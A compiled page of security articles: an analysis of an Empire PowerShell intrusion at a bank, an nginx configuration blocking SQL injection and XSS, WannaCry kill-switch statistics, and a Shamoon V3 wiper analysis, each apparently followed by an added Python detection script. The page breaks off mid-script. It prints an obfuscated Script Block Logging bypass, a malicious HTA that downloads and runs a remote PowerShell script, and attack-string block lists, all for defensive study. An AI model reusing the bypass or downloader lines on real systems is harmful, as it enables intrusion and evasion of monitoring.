Channel: CodeSection, Code Area, Cyber Security - CodeSec

Detecting Empire Attack Traffic in a Real-World PoC

Straight to the point

Recently we were working on a PoC for a large banking customer. After several days of analysis we found multiple security threats on the same device, including threats that are commonly seen during penetration tests.

For example:

1. an EICAR test sample;

2. CQHashDumpv2 (a credential-dumping tool);

3. a Netcat installation.

After asking the customer, we learned that some of these events were authorized penetration-testing checks carried out at the time.

Soon afterwards, however, we found exploit activity targeting Firefox. The full attack timeline is shown in the figure below:



That figure is enough to understand what happened on the device. We then noticed several interesting details:

1. The attack began with a malicious Word document downloaded through Firefox (very likely from an email). The document used a macro to open a PowerShell console and then run Empire code.

The exploit file detected by our agent:



According to VirusTotal, the exploit file we detected had never been seen before. The exploit was first uploaded at 2018-10-24 09:17:01 UTC, just two hours before the customer's device opened the file.


2. After the threat was detected, only 12 of VirusTotal's 57 engines (the AI-based ones) identified the malicious document:

3. PowerShell loaded obfuscated Base64 code:

The obfuscated code is shown below:

```powershell
-W 1-C[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex;[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('
```

We then recovered the Base64 code in two stages:

Semi-obfuscated code

```powershell
If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr-ge3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR
```

Deobfuscated code

```powershell
If(${PSVersIoNTAble}.PSVersioN.MaJOr-ge 3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySettings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${GPC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScriptBlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR
```

It turned out to be a very popular piece of Empire code, available on GitHub: [link].
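The two recovery stages described above (removing the backticks, then folding the string concatenations) and the decode-Base64-then-iex pattern can be automated. The following Python script is an added example; it is not part of the original article or of Empire. It runs against a constructed command line modelled on the one quoted above (the Base64 stage is the article's own, the rest is abbreviated) and reports the behaviours a defender would alert on, including the cachedGroupPolicySettings tampering that switches off Script Block Logging. The function names and the indicator wording are the example's own.

```python
import base64
import re

# Constructed sample modelled on the command line quoted in the article: a hidden
# window (-W 1), a Base64 stage that is decoded and piped to iex, and a backtick-
# obfuscated body that zeroes the ScriptBlockLogging policy keys. Not the full payload.
SAMPLE_CMDLINE = (
    "powershell -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex;"
    "If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr-ge3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'"
    "+'me'+'nt'+'.A'+'utomation.U'+'tils')).\"GeTFIe`Ld\"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),"
    "'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});"
    "${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0}"
)

BASE64_STAGE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
ENCODED_COMMAND = re.compile(r"-e(?:c|nc|ncodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'ab'+'cd'  ->  'abcd'
PAREN = re.compile(r"\(\s*'([^']*)'\s*\)")           # ('abcd')   ->  'abcd'


def strip_backticks(text: str) -> str:
    """Stage 1 of the article's recovery: drop the backticks that split identifiers
    (P`S`Vers`IoNTAble -> PSVersIoNTAble). Genuine escapes such as `n are left alone."""
    return re.sub(r"`(?![nrt0abfv])", "", text)


def join_concats(text: str) -> str:
    """Stage 2: fold ('Scri'+'pt')+('Block') style concatenations into one literal."""
    while True:
        folded = PAREN.sub(r"'\1'", CONCAT.sub(r"'\1\2'", text))
        if folded == text:
            return folded
        text = folded


def decode_base64_stages(text: str) -> list:
    """Decode every FromBase64String('...') argument and every -enc payload. UTF-16LE
    (what -EncodedCommand expects) is recognised by its embedded NUL bytes."""
    stages = []
    for pattern in (BASE64_STAGE, ENCODED_COMMAND):
        for match in pattern.finditer(text):
            try:
                raw = base64.b64decode(match.group(1), validate=True)
            except ValueError:
                continue
            encoding = "utf-16-le" if b"\x00" in raw else "ascii"
            stages.append(raw.decode(encoding, errors="replace"))
    return stages


def analyze_powershell(cmdline: str) -> dict:
    """Recover the readable form of a command line and list what a defender should alert on."""
    deobfuscated = join_concats(strip_backticks(cmdline))
    stages = decode_base64_stages(cmdline)
    indicators = []
    backticks = cmdline.count("`")
    if backticks >= 5:
        indicators.append(f"backtick obfuscation ({backticks} backticks)")
    if stages and re.search(r"\|\s*iex\b|Invoke-Expression", cmdline, re.IGNORECASE):
        indicators.append("decoded Base64 stage piped to Invoke-Expression")
    if re.search(r"-W(?:indowStyle)?\s+(?:1|Hidden)\b", cmdline, re.IGNORECASE):
        indicators.append("hidden window (-W 1)")
    if "cachedGroupPolicySettings" in deobfuscated:
        indicators.append("tampering with cachedGroupPolicySettings (Script Block Logging bypass)")
    if re.search(r"EnableScriptBlock(?:Invocation)?Logging'\]\s*=\s*0", deobfuscated):
        indicators.append("EnableScriptBlockLogging set to 0")
    return {"deobfuscated": deobfuscated, "decoded_stages": stages, "indicators": indicators}


if __name__ == "__main__":
    result = analyze_powershell(SAMPLE_CMDLINE)
    print("decoded stages:", result["decoded_stages"])
    print("deobfuscated:", result["deobfuscated"])
    for indicator in result["indicators"]:
        print(" -", indicator)
```

The decoded Base64 stage is the article's own ("stop-process -name regsvr32 ..."), and the folded body exposes the reflection call on System.Management.Automation.Utils that Empire uses to turn off Script Block Logging before the real payload runs, which is why a process-creation or 4104 event containing either string deserves a high-severity rule.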

4. The certutil process loaded a suspicious file: emp.txt hvKqcJJPFnm7.txt

As you can see, the file name is very odd: a .txt file with another ".txt" inside its name, which is what caught our attention.

5. We also suspect that cmd loaded a BAT file:

The file name involved was a long random string, and the file was located under the \AppData\Roaming\ directory.

Summary

For a banking customer, this type of attack can have serious consequences, including financial loss, so timely detection and analysis of the PoC is critical. In this analysis we successfully extracted threat indicators from the PoC, which can help further improve the effectiveness of endpoint protection solutions.

*Source: sentinelone; compiled by FB editor Alpha_h4ck; please credit CodeSec.Net when reposting


Practical Nginx Configuration to Block SQL Injection and XSS Attacks


Yesterday, near the end of the workday, Mingyue noticed that the blog (iMydl.com) was slow and even returning 504 errors. Checking the server load with `top -i` showed it had climbed as high as 3.2, with the spikes becoming more frequent and trending upward. At first it looked like an attack, but rate-limiting the visiting IPs did not help much, and blocking a few of the main IPs in the CDN did not help much either. At that point Mingyue realized this was most likely a malicious scanning attack.



Analysis of the server WAF logs showed the requests were almost all SQL injection and XSS attempts. They bypassed the CDN cache rules and went straight to the origin, generating more and more PHP/MySQL requests, which is what drove the load up. The logs showed that nearly all of them were GET/POST requests. Although the WAF identified and blocked every one of them, there were no countermeasures at the Nginx level, so they still put pressure on the server. So I added anti-SQL-injection and anti-XSS configuration to Nginx as well, and the result was surprisingly good.


Put the Nginx configuration below inside the server block of the site's .conf file, then restart Nginx for it to take effect.

```nginx
if ($request_method !~* GET|POST) { return 444; }
# returning 444 (close the connection without a response) further reduces server load

# block SQL injection
if ($query_string ~* (\$|'|--|[+|(%20)]union[+|(%20)]|[+|(%20)]insert[+|(%20)]|[+|(%20)]drop[+|(%20)]|[+|(%20)]truncate[+|(%20)]|[+|(%20)]update[+|(%20)]|[+|(%20)]from[+|(%20)]|[+|(%20)]grant[+|(%20)]|[+|(%20)]exec[+|(%20)]|[+|(%20)]where[+|(%20)]|[+|(%20)]select[+|(%20)]|[+|(%20)]and[+|(%20)]|[+|(%20)]or[+|(%20)]|[+|(%20)]count[+|(%20)]|[+|(%20)]exec[+|(%20)]|[+|(%20)]chr[+|(%20)]|[+|(%20)]mid[+|(%20)]|[+|(%20)]like[+|(%20)]|[+|(%20)]iframe[+|(%20)]|[\<|%3c]script[\>|%3e]|javascript|alert|webscan|dbappsecurity|style|confirm\(|innerhtml|innertext)(.*)$) { return 555; }
if ($uri ~* (/~).*) { return 501; }
if ($uri ~* (\\x.)) { return 501; }

# block SQL injection
if ($query_string ~* "[;'<>].*") { return 509; }
if ($request_uri ~ " ") { return 509; }
if ($request_uri ~ (\/\.+)) { return 509; }
if ($request_uri ~ (\.+\/)) { return 509; }
#if ($uri ~* (insert|select|delete|update|count|master|truncate|declare|exec|\*|\')(.*)$ ) { return 503; }

# block SQL injection
if ($request_uri ~* "(cost\()|(concat\()") { return 504; }
if ($request_uri ~* "[+|(%20)]union[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]and[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]select[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]or[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]delete[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]update[+|(%20)]") { return 504; }
if ($request_uri ~* "[+|(%20)]insert[+|(%20)]") { return 504; }
if ($query_string ~ "(<|%3C).*script.*(>|%3E)") { return 505; }
if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") { return 505; }
if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") { return 505; }
if ($query_string ~ "proc/self/environ") { return 505; }
if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") { return 505; }
if ($query_string ~ "base64_(en|de)code\(.*\)") { return 505; }
if ($query_string ~ "[a-zA-Z0-9_]=http://") { return 506; }
if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") { return 506; }
if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") { return 506; }
if ($query_string ~ "\b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)\b") { return 507; }
if ($query_string ~ "\b(erections|hoodia|huronriveracres|impotence|levitra|libido)\b") { return 507; }
if ($query_string ~ "\b(ambien|bluespill|cialis|cocaine|ejaculation|erectile)\b") { return 507; }
if ($query_string ~ "\b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)\b") { return 507; }

# Add or remove the patterns above to suit your own site. Blocking cURL and wget is a bit extreme,
# but "better to block a thousand by mistake than let one through".
if ($http_user_agent ~* YisouSpider|ApacheBench|WebBench|Jmeter|JoeDog|Havij|GetRight|TurnitinBot|GrabNet|masscan|mail2000|github|wget|curl|Java|python) { return 508; }

# Likewise, add or remove the blocking patterns below according to your own site.
if ($http_user_agent ~* "Go-Ahead-Got-It") { return 508; }
if ($http_user_agent ~* "GetWeb!") { return 508; }
if ($http_user_agent ~* "Go!Zilla") { return 508; }
if ($http_user_agent ~* "Download Demon") { return 508; }
if ($http_user_agent ~* "Indy Library") { return 508; }
if ($http_user_agent ~* "libwww-perl") { return 508; }
if ($http_user_agent ~* "Nmap Scripting Engine") { return 508; }
if ($http_user_agent ~* "~17ce.com") { return 508; }
if ($http_user_agent ~* "WebBench*") { return 508; }
if ($http_user_agent ~* "spider") { return 508; }
# this one affects some Chinese search-engine crawlers, e.g. Sogou
# Block the User-Agents of malicious requests; use the site's access logs or WAF logs as a reference when configuring.

if ($http_referer ~* 17ce.com) { return 509; }
# block requests from 17ce.com speed-test nodes; this is why Mingyue keeps saying such speed-test figures are for reference only
if ($http_referer ~* "WebBench*") { return 509; }
# block WebBench and similar load-testing tools; for other tools just substitute the name
```

After a night of testing, the configuration above has run stably. Combined with the server's firewall rules and the WAF's blocking, the site is back to normal and the server load is within the normal range. Mingyue collected and organized this configuration and is sharing it in the hope that it helps webmasters who need it!
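Because these rules are plain regular expressions, their false positives can be measured before they go live. The Python script below is an added example, not part of the original post: it runs a subset of the rules above, in the order they appear in the config, against constructed requests and returns the status code nginx would send. The first $query_string pattern is abbreviated from the page's long alternation; the others are copied verbatim, and the `evaluate` function, the nginx-variable approximation and the sample requests are the example's own.

```python
import re
from urllib.parse import unquote

# Rules from the config above, in file order (nginx evaluates if/return in the rewrite
# phase, so the first match decides). Tuple: (variable, pattern, case_insensitive, negated, status).
# The first $query_string pattern is abbreviated from the page's long alternation; the rest are verbatim.
RULES = [
    ("request_method", r"GET|POST", True, True, 444),
    ("query_string", r"(\$|'|--|[+|(%20)]union[+|(%20)]|[+|(%20)]select[+|(%20)]|[+|(%20)]or[+|(%20)]"
                     r"|[\<|%3c]script[\>|%3e]|javascript|alert|style|innerhtml)(.*)$", True, False, 555),
    ("uri", r"(/~).*", True, False, 501),
    ("uri", r"(\\x.)", True, False, 501),
    ("query_string", r"[;'<>].*", True, False, 509),
    ("request_uri", r" ", False, False, 509),
    ("request_uri", r"(\/\.+)", False, False, 509),
    ("request_uri", r"(\.+\/)", False, False, 509),
    ("request_uri", r"[+|(%20)]union[+|(%20)]", True, False, 504),
    ("query_string", r"(<|%3C).*script.*(>|%3E)", False, False, 505),
    ("query_string", r"proc/self/environ", False, False, 505),
    ("http_user_agent", r"YisouSpider|ApacheBench|WebBench|Jmeter|JoeDog|Havij|GetRight|TurnitinBot|GrabNet"
                        r"|masscan|mail2000|github|wget|curl|Java|python", True, False, 508),
    ("http_user_agent", r"spider", True, False, 508),
    ("http_referer", r"17ce.com", True, False, 509),
]
COMPILED = [(var, re.compile(pat, re.IGNORECASE if ci else 0), negated, code)
            for var, pat, ci, negated, code in RULES]


def nginx_variables(method, request_uri, user_agent="", referer=""):
    """Approximate the nginx variables the rules read: $uri is the decoded, query-less
    path; $request_uri and $query_string are the raw request-line values."""
    path, _, query = request_uri.partition("?")
    return {
        "request_method": method,
        "request_uri": request_uri,
        "uri": unquote(path),
        "query_string": query,
        "http_user_agent": user_agent,
        "http_referer": referer,
    }


def evaluate(method, request_uri, user_agent="", referer=""):
    """Return the status the first matching rule would return, or None if the request passes."""
    variables = nginx_variables(method, request_uri, user_agent, referer)
    for var, regex, negated, code in COMPILED:
        matched = regex.search(variables[var]) is not None
        if matched != negated:          # "~" fires on a match, "!~" fires on no match
            return code
    return None


# Constructed requests: two obvious attacks and several legitimate requests that the
# rules also reject, which is the tuning the author says each site must do itself.
SAMPLE_REQUESTS = [
    ("GET", "/index.php?id=1", "Mozilla/5.0"),
    ("GET", "/index.php?id=1'%20OR%20'1'='1", "Mozilla/5.0"),
    ("GET", "/?q=%3Cscript%3Ealert(1)%3C/script%3E", "Mozilla/5.0"),
    ("GET", "/.well-known/acme-challenge/token", "Mozilla/5.0"),   # ACME renewal
    ("GET", "/search?q=O'Brien", "Mozilla/5.0"),                   # apostrophe in a name
    ("GET", "/?page=2&style=compact", "Mozilla/5.0"),              # 'style' as a parameter name
    ("GET", "/api/status", "curl/7.68.0"),                         # monitoring probe
    ("HEAD", "/", "Mozilla/5.0"),                                  # HEAD is neither GET nor POST
]


def report(requests=SAMPLE_REQUESTS):
    """Evaluate each sample request; returns (method, request_uri, status_or_None)."""
    return [(method, uri, evaluate(method, uri, agent)) for method, uri, agent in requests]


if __name__ == "__main__":
    for method, uri, status in report():
        print(f"{method:4} {uri:45} -> {status if status else 'allowed'}")
```

Two things the run makes visible: `[+|(%20)]` is a character class, not the alternation `(\+|%20)` the author probably meant, so it matches any single one of the characters `+ | ( % 2 0 )`; and several rules reject ordinary traffic (the ACME path because of `(\/\.+)`, a query containing `style` or an apostrophe, HEAD requests because `!~* GET|POST` excludes them). Replay a day of your own access log through `evaluate` before enabling the rules, and drop or narrow the ones that fire on legitimate requests.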

18 Months After the Outbreak, WannaCry Is Still Showing Up on Infected Computers


Tencent Tech: According to foreign media reports, 18 months after the WannaCry ransomware outbreak it still appears, like a ghost, on thousands (if not hundreds of thousands) of infected computers.

When WannaCry first broke out, Kryptos Logic security researcher Marcus Hutchins registered a domain and found the attack's "kill switch", successfully stopping WannaCry from spreading. If the malware can connect to the kill-switch domain, its ransomware component does not activate. However, the malware keeps running silently in the background and periodically connects to the kill-switch domain to check whether it is still active.

Last Friday, Jamie Hankins, head of security and threat intelligence research at Kryptos Logic, posted a tweet on Twitter publishing the number of connections and IP addresses hitting the kill-switch domain. Although the kill switch is now hosted by Cloudflare, Hankins said they still have access to the domain's statistics.

According to the data Hankins published, the WannaCry kill-switch domain received more than 17 million connections in one week, from more than 630,000 IP addresses in 194 countries and regions.

The chart below shows the countries still most affected by WannaCry, with China, Indonesia and Vietnam in the top three. Hankins said that, based on one day's statistics, connections from the UK accounted for about 0.15% of the total and connections from the US for 1.35%.


Figure 2: IP addresses infected with WannaCry, by country, over one week

Hankins also posted a chart of connections per week. As expected, there are more connections on working days than at weekends, as more users come into the office and turn on their computers.


Figure 3: connections over one week

The fact that so many computers are still infected with this malware is a real problem.

To address it, Hankins recommends that corporate customers use their TellTale service to check that their IP addresses are not infected with WannaCry.

In April 2018, Kryptos Logic launched a service called TellTale that allows any organization to monitor whether its IP addresses are infected. If an organization's computers are infected with WannaCry, or with any other known malware that Kryptos Logic monitors, TellTale notifies the organization as soon as it detects the infection.

Since many organizations are still affected by WannaCry and other stealthy malware, TellTale is a useful tool for warning organizations promptly when they are infected. (Tencent Tech; reviewed by Lexue)

Suspected Iranian Hacking Group APT33 Strikes Again, Launching a New Wave of Attacks with Shamoon V3


Last week, the McAfee Advanced Threat Research team published an analysis of a new wave of Shamoon "wiper" (disk-wiping malware) attacks against businesses in the Middle East and Europe, discussing how the latest campaign differs from earlier Shamoon campaigns. Most notably, the latest version of Shamoon (Shamoon V3) is used both as a wiper module and as stand-alone malware.

Based on their analysis of Shamoon V3 and other clues, the team concluded that the actor behind these attacks is very likely the Iranian group APT33, or a group trying to pass itself off as APT33.

In the 2016-2017 Shamoon campaigns, the attackers used Shamoon V2 together with another wiper, Stonedrill. In the 2018 campaign, the team observed Shamoon V3 alongside another wiper, Filerase, first mentioned by Symantec.

The team's analysis shows that the latest Shamoon appears to be only one part of a .NET toolkit with multiple modules. Specifically, the team identified the following modules:

OCLC.exe: reads the attacker-created list of target computers and runs the second tool, spreader.exe.
Spreader.exe: spreads the wiper to the target computers; also used to obtain information about the operating system version.
SpreaderPsexec.exe: similar to spreader.exe, but uses psexec.exe to execute the wiper remotely.
SlHost.exe: the wiper module; walks the system and wipes every target file.

This also suggests that at least several developers were involved in preparing the malware for the latest wave. In an earlier article the team noted that Shamoon V3, as a wiper module in the .NET toolkit, could also be used as stand-alone malware by other groups; the recent attacks appear to confirm this. The team also learned that the attackers had begun preparing the new campaign several months in advance, with the aim of destroying target systems by running the wiper.

This article provides further insight into the new wave of Shamoon attacks and a detailed analysis of the .NET toolkit.

Geopolitical background

As before, the motive is unclear: Shamoon V1 hit two targets in the Middle East, Shamoon V2 hit multiple targets in Saudi Arabia, and Shamoon V3 used a European supplier to launch a supply-chain attack on Middle Eastern businesses.

In the .NET toolkit, the team found the following ASCII art:

The characters form a pattern resembling the Arabic phrase “ ”, a verse from the Quran (Surah Masad, Ayat 1 [111:1]) meaning "May the hands of the Father of Flame perish! He has perished."

Attack flow

How did the malware get into the victim's network?

The team's analysis shows that, during the preparation phase, the attackers created websites closely resembling certain legitimate domains (job-offer sites). For example:

Hxxp://possibletarget.ddns.com:880/JobOffering

Many of the URLs the team found were related to energy companies operating mainly in the Middle East. Some of these sites contained malicious HTML Application files that executed further payloads; the rest were designed to lure victims into logging in with their credentials. According to McAfee telemetry, these attacks appear to have started in late August 2018, with the aim of harvesting those credentials.

Below is a code sample from one of the malicious HTML Application files:

```javascript
YjDrMeQhBOsJZ = "WS"
wcpRKUHoZNcZpzPzhnJw = "crip"
RulsTzxTrzYD = "t.Sh"
MPETWYrrRvxsCx = "ell"
PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)
OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)
ULRXZmHsCORQNoLHPxW = "cm"
zhKokjoiBdFhTLiGUQD = "d.e"
KoORGlpnUicmMHtWdpkRwmXeQN = "xe"
KoORGlpnUicmMHtWdp = "."
KoORGlicmMHtWdp = "('http://mynetwork.ddns.net:880/*****.ps1')
OoOVRmsXUQhNqZJTPOlkymqzsA.run('%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -w 1 IEX (New-Object Net.WebClient)'+KoORGlpnUicmMHtWdp+'downloadstring'+KoORGlicmMHtWdp)
OoOVRmsXUQhNqZJTPOlkymqzsA.run('%windir%\\System32\\' + FKeRGlzVvDMH + ' /c powershell -window hidden -enc
```

The script above was used to open a command shell on the victim's computer and download a PowerShell script from an external server. Analysis of that PowerShell script shows it was used to collect information such as user names, passwords and domain names. Part of the PowerShell script:

```powershell
function primer {
  if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}
  $o="$env:userdomain\$u $env:computername $env:PROCESSOR_ARCHITECTURE
```

With the harvested credentials, the attackers could log in to the target network and spread the wiper.

.NET toolkit

As mentioned above, the new wave of Shamoon attacks was carried out with a .NET toolkit designed to spread Shamoon V3 and Filerase.



The first module (OCLC.exe) reads two text files stored in two local directories ("shutter" and "light"), which contain the list of target computers.

OCLC.exe also starts a new hidden command-window process to run the second module, Spreader.exe, which takes those two text files as arguments in order to spread Shamoon V3 and Filerase.


First, the Spreader.exe module takes the two text files, containing the target computer list and the Windows version, as arguments and checks the Windows version of the target computers.


Then it places the executables (Shamoon and Filerase) in the folder "Net2".

It also creates a folder on the remote computer: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

Then it copies the executables into that folder.

Next, it creates a batch file "\\RemoteMachine\admin$\\process.bat" to run the executables on the remote computer. Note that this batch file contains the paths of the executables. It then sets the permissions needed to run the batch file.

If this process fails, the Spreader.exe module creates a text file named "NotFound.txt" containing the target computer name and operating system version, which the attackers can use to track problems during spreading.

Some of the functions involved in the process above:

If no executables exist in the "Net2" folder, the Spreader.exe module checks the folders "all" and "Net4".

To spread the wiper, the attackers also used another module, SpreaderPsexec.exe. Psexec.exe is an administrative tool from Microsoft's PSTools suite for executing commands remotely.

The difference here is that the Psexec.exe used by SpreaderPsexec.exe is stored in the "Net2" folder, which means it can also be used on other computers to spread the wiper further.


The wiper has three options:

SilentMode: runs the wiper without producing any output.
BypassAcl: elevates privileges. Notably, it is always enabled.
PrintStackTrace: tracks the number of folders and files wiped.

As noted above, BypassAcl is always enabled (always "true"). It grants the wiper the following privileges:

SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeSecurityPrivilege

To find target files, the wiper uses the GetFullPath function to obtain their paths.


It wipes every target folder and file it finds.

As stated at the beginning, it can traverse every file in every folder on the system.

For the files and folders to be wiped, the wiper first removes their "read-only" attribute.

Next, it changes the creation, modification and access times of each file to 1 January 3000, 12:01:01.

Then it overwrites each file twice with random strings.

It first wipes the file using the CreateFile API with the ACCESS_MASK DELETE flag.

Then it wipes the file using FILE_DISPOSITION_INFORMATION.

The ProcessTracker function is used to track the wiping.


Summary

The McAfee Advanced Threat Research team said that in the 2017 Shamoon wave they observed two wipers, and in the December 2018 attacks they observed similar characteristics. Using a "toolkit" approach, the attackers can spread the wiper module across the victim's network. The toolkit is written in .NET and is not obfuscated, unlike Shamoon V3 as a wiper module, whose code is encrypted as a means of evading security detection.

It is hard to determine the motive for these attacks, as the McAfee team has not found enough clues. But they said they did see techniques from Shamoon V2 in Shamoon V3. Political statements also seem to have become part of Shamoon attacks: V1 used an image of a burning US flag; V2 used an image of a drowned Syrian boy (with Yemeni Arabic text), apparently alluding to the conflicts in Syria and Yemen; and now V3 contains a verse from the Quran, possibly indicating that the motive is tied to another Middle East conflict.

By comparing the TTPs (tactics, techniques and procedures), domains and tools used in these attacks (as described by FireEye in its report), the McAfee team concluded that the actor behind them is very likely the Iranian group APT33, or a group trying to pass itself off as APT33.

IOCs

Hashes:

OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and file names:

C:\net2\
C:\all\
C:\net4\
C:\windows\system32\
C:\\Windows\System32\Program Files\Internet Explorer\Signing
\\admin$\process.bat
NothingFound.txt
MaintenaceSrv32.exe
MaintenaceSrv64.exe
SlHost.exe
OCLC.exe
Spreader.exe
SpreaderPsexec.exe

Command line:
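The wiper behaviour and the IOCs above (the 3000-01-01 12:01:01 timestamp the wiper writes, the toolkit hashes and the staging paths) can be folded into a simple host triage check. The Python code below is an added example and is not part of the McAfee report: the hashes, file names and directories are taken from the IOC list above (NotFound.txt from the body text), while `classify`, `triage_records`, `scan_directory` and the sample records are constructed for this illustration.

```python
import hashlib
import ntpath
import os
from datetime import datetime

# SHA-256 values from the IOC list above, lower-cased for comparison.
IOC_SHA256 = {
    "d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a",  # OCLC.exe
    "35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b",  # Spreader.exe
    "2abc567b505d0678954603dcb13c438b8f44092cfe3f15713148ca459d41c63f",  # SpreaderPsexec.exe
    "5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a",  # SlHost.exe
}
# File names and staging directories from the IOC list (NotFound.txt is the name used in the body text).
IOC_FILENAMES = {"oclc.exe", "spreader.exe", "spreaderpsexec.exe", "slhost.exe", "maintenacesrv32.exe",
                 "maintenacesrv64.exe", "process.bat", "nothingfound.txt", "notfound.txt"}
IOC_DIRS = {r"c:\net2", r"c:\all", r"c:\net4",
            r"c:\windows\system32\program files\internet explorer\signing"}
# The timestamp the wiper writes to every file before overwriting it.
WIPER_SENTINEL = datetime(3000, 1, 1, 12, 1, 1)


def classify(path: str, mtime: datetime, sha256: str = None) -> list:
    """Return the reasons one file record looks like Shamoon V3 toolkit activity (empty if none)."""
    reasons = []
    name = ntpath.basename(path).lower()
    directory = ntpath.dirname(path).lower().rstrip("\\")
    if sha256 and sha256.lower() in IOC_SHA256:
        reasons.append("hash matches toolkit IOC")
    if name in IOC_FILENAMES:
        reasons.append(f"file name '{name}' is a toolkit IOC")
    if any(directory == d or directory.startswith(d + "\\") for d in IOC_DIRS):
        reasons.append("located in a staging directory used by the spreader")
    if mtime == WIPER_SENTINEL:
        reasons.append("timestamp set to 3000-01-01 12:01:01 (wiper sentinel)")
    return reasons


def triage_records(records) -> list:
    """records: iterable of (path, mtime, sha256 or None). Returns [(path, reasons)] for flagged files."""
    flagged = []
    for path, mtime, digest in records:
        reasons = classify(path, mtime, digest)
        if reasons:
            flagged.append((path, reasons))
    return flagged


def sha256_of(path: str) -> str:
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_directory(root: str) -> list:
    """Build records from a live tree and triage them. Only executables, batch files and text
    files are hashed; a modification time that datetime cannot represent is treated like the
    sentinel, because a far-future stamp is itself the wiper's fingerprint."""
    records = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            full = os.path.join(dirpath, filename)
            try:
                mtime = datetime.fromtimestamp(os.stat(full).st_mtime)
            except (OverflowError, OSError, ValueError):
                mtime = WIPER_SENTINEL
            digest = sha256_of(full) if filename.lower().endswith((".exe", ".bat", ".txt")) else None
            records.append((full, mtime, digest))
    return triage_records(records)


# Constructed records standing in for a directory listing from a suspected host.
SAMPLE_RECORDS = [
    (r"C:\Users\alice\Documents\report.docx", datetime(2018, 12, 10, 9, 30), hashlib.sha256(b"benign").hexdigest()),
    (r"C:\net2\SlHost.exe", datetime(2018, 12, 9, 3, 0), "5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a"),
    (r"C:\Users\alice\Documents\budget.xlsx", WIPER_SENTINEL, hashlib.sha256(b"random overwrite").hexdigest()),
    (r"C:\Windows\System32\Program Files\Internet Explorer\Signing\process.bat", datetime(2018, 12, 9, 3, 1), None),
]

if __name__ == "__main__":
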